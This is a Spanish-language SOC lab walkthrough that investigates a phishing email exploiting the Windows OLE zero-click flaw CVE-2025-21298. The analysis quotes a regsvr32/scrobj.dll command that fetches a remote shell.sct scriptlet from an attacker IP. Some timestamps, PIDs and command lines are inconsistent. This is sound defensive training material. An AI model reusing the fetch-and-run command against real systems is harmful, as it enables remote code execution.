
SOC336 - Guía paso a paso: Detección de explotación RCE de cero clics en OLE de Windows (CVE-2025-21298)
Uno de nuestros empleados, Austin, recibió un correo electrónico de phishing de un remitente sospechoso y se activó una alerta después de que abriera el correo usando Outlook el 4 de febrero de 2025 a las 04:18 PM. El motivo de la activación fue "Adjunto RTF malicioso identificado con patrón de exploit conocido CVE-2025-21298" .
EventID : 314
Hora del Evento : Feb, 04, 2025, 04:18 PM (creo que estaba mal)
Regla : SOC336 - Detección de Explotación RCE Zero-Click OLE de Windows (CVE-2025-21298)
Nivel : Analista de Seguridad
Dirección SMTP : 84.38.130.118
Dirección de Origen : [email protected]
Dirección de Destino : [email protected]
Asunto del Correo : Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto
Adjunto : mail.rtf
Hash del Adjunto : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Acción del Dispositivo : Permitido
Motivo de Activación : Adjunto RTF malicioso identificado con patrón de exploit conocido CVE-2025-21298.
Profundicemos en los registros de Seguridad del Correo Electrónico, Gestión de Registros y Seguridad del Endpoint para el triaje de la alerta.
Busqué la dirección del remitente projectmanagement@pm[.]me y hice clic en el correo "Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto" enviado a las 05:12 AM del mismo día, lo que me pareció extraño porque los tonos y palabras urgentes como "Importante" y "Acción Requerida" me dieron una pista de que se trataba de un correo de phishing.
Busqué el dominio pm[.]me en VirusTotal y solo 1 proveedor lo consideró sospechoso.
Sin embargo, cuando busqué la dirección SMTP 84[.]38[.]130[.]118, 7 proveedores la marcaron como Maliciosa y Malware, y estaba relacionada con el servidor C2 SILVER.
84[.]38[.]130[.]118 también se encontró en la base de datos de AbuseIPDB. Se ubica en Riga, Riga, Letonia, pertenece al nombre de dominio rixhost.lv y está categorizada como Ataque DDoS, Hacking y Host Explotado.
Finalmente, busqué el hash df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 del adjunto mail.rtf en VirusTotal y 29 de 61 proveedores marcaron el adjunto como Malicioso. Pertenece a la familia de malware rtfmalformb y estaba asociado con la vulnerabilidad CVE-2025-21298.
Se confirmó que se envió un correo de phishing con un adjunto malicioso a Austin.
Investiguemos si hubo actividades sospechosas después de las 05:12 AM cuando Austin abrió el correo de phishing.
Primero revisé el registro de proxy y busqué la dirección IP maliciosa del remitente 84[.]38[.]130[.]118, descubriendo que a las 08:06 AM hubo una solicitud HTTP GET a la dirección IP maliciosa con una URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada por cmd.exe, descargando un archivo scriptlet de Windows. El código de respuesta fue 200 OK, lo que indica que el tráfico saliente fue permitido y no bloqueado por el firewall. Era inusual obtener un archivo de script que posiblemente contenía un script de reverse shell.
Dado que el tráfico saliente hacia la dirección IP maliciosa fue iniciado por cmd.exe, primero revisé el historial del terminal y encontré que a las 08:06:08 AM se ejecutó el comando "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" para generar regsvr32.exe y obtener el archivo scriptlet de la dirección IP maliciosa mediante scrobj.dll.
¡Usar las utilidades integradas de Windows para obtener el script puede dejar rastros mínimos en el sistema, dificultando el proceso de ingeniería inversa y análisis de malware!
Se confirmó que hubo una conexión a la IP maliciosa 84[.]38[.]130[.]118 a las 08:06:42 AM, después del evento de ejecución del comando.
Entonces, ¿por qué se ejecutó cmd.exe con solo hacer clic en un correo electrónico? Si bien no se encontró evidencia de la descarga del adjunto malicioso mail.rtf por parte de Austin, revisé los registros del endpoint y busqué cualquier evento alrededor de las 08:06 AM.
ID del Proceso: 7023
Hora del evento: Feb 04 2025 08:06:25
Línea de comandos: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Proceso padre: cmd.exe
Bien, entonces veamos el proceso padre cmd.exe
ID del Proceso: 6784
Hora del evento: Feb 04 2025 08:06:08
Línea de comandos: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
Proceso padre: outlook.exe
Y finalmente revisé el proceso padre de outlook.exe
ID del Proceso: 4820
Hora del evento: Feb 04 2025 08:05:15
Línea de comandos: "C:\Windows\System32\cmd.exe"
Proceso padre: explorer.exe
Podemos concluir los procesos maliciosos en un árbol:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ¡Ejecución del Script!
Sin embargo, todavía me preguntaba cómo se iniciaron los procesos maliciosos sin descargar y abrir el adjunto malicioso, y cómo outlook.exe generó el proceso malicioso hasta que encontré información sobre CVE-2025-21298.
Según el artículo de Offsec, hubo una vulnerabilidad crítica de Windows OLE zero-click que permite RCE a través del correo electrónico con una puntuación CVSS de 9.8 en enero de 2025. Cuando el destinatario objetivo simplemente abre o previsualiza el correo malicioso en Microsoft Outlook que contiene un documento RTF dañino con un script incrustado, la vulnerabilidad se activa, permitiendo al atacante ejecutar código arbitrario en el sistema afectado.
Investigué sobre Windows OLE y los procesos de secuestro del documento RTF en Google y Gemini, y lo relacioné con algunos de mis conocimientos de ingeniería inversa:
No puesto en cuarentena
Malicioso
Accedido
Clasificación: Crítica
Tipo: Malware
Hora de la Actividad:
Feb, 04, 2025, 05:12 AM (Correo de phishing recibido)
Feb, 04, 2025, 08:05:15 AM - Feb, 04, 2025, 08:06:42 AM (Correo de phishing abierto y código malicioso ejecutado)
Entidades Afectadas:
Dirección de Origen: projectmanagement@pm[.]me
Dirección SMTP: 84[.]38[.]130[.]118
Dirección de Correo del Destinatario: Austin@letsdefend[.]io
Dirección IP del Destinatario: 172[.]16[.]17[.]137
Nombre de Host: Austin
Razones para Falso Positivo:
El 4 de febrero de 2025 a las 05:12 AM se envió un correo sospechoso con el asunto "Importante: Acción Requerida para la Próxima Fecha Límite del Proyecto" desde [email protected] (Dirección IP: 84.38.130.118) a [email protected] (Dirección IP: 172.16.17.137) con un adjunto mail.rtf (hash SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). Los tonos y palabras de urgencia utilizados en el asunto dieron una pista de que se trataba de un correo de phishing. Las fuentes de inteligencia de amenazas VirusTotal y AbuseIPDB marcaron la dirección IP del remitente, ubicada en Riga, Riga, Letonia y perteneciente al nombre de dominio rixhost.lv, y el adjunto como maliciosos y malware.
Según los registros de proxy, a las 08:06 AM hubo una solicitud HTTP GET a la dirección IP maliciosa con una URL hxxp://84[.]38[.]130[.]118/shell[.]sct iniciada por cmd.exe, descargando un archivo scriptlet de Windows. El código de respuesta fue 200 OK, lo que indica que el tráfico saliente hacia la dirección IP maliciosa fue permitido y no bloqueado por el firewall.
Según los registros de Seguridad del Endpoint, el código malicioso "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) fue iniciado por cmd.exe (PID: 6784) generado desde outlook.exe (PID: 4820).
La explotación fue causada por una vulnerabilidad crítica de Windows OLE zero-click (CVE-2025-21298) que permite RCE a través del correo electrónico con una puntuación CVSS de 9.8 en enero de 2025. Cuando el destinatario objetivo simplemente abre o previsualiza el correo malicioso en Microsoft Outlook que contiene un documento RTF dañino con un script incrustado, la vulnerabilidad se activa, permitiendo al atacante ejecutar código arbitrario en el sistema afectado, potencialmente estableciendo una reverse shell al servidor C2.
Razones para escalamiento:
Si bien aún no se ha observado de manera definitiva tráfico de red C2 activo posterior a la explotación, los registros de seguridad del endpoint confirmaron la ejecución de regsvr32.exe usando scrobj.dll para obtener el archivo scriptlet shell.sct. Debido a la puntuación CVSS de 9.8 del CVE-2025-21298, se requiere una investigación adicional para verificar si hay alguna actividad sospechosa en el host, como persistencia o exfiltración de datos.
Remedios:
Indicadores de Compromiso:
CVE-2025-21298: Una vulnerabilidad crítica de Windows OLE de cero clics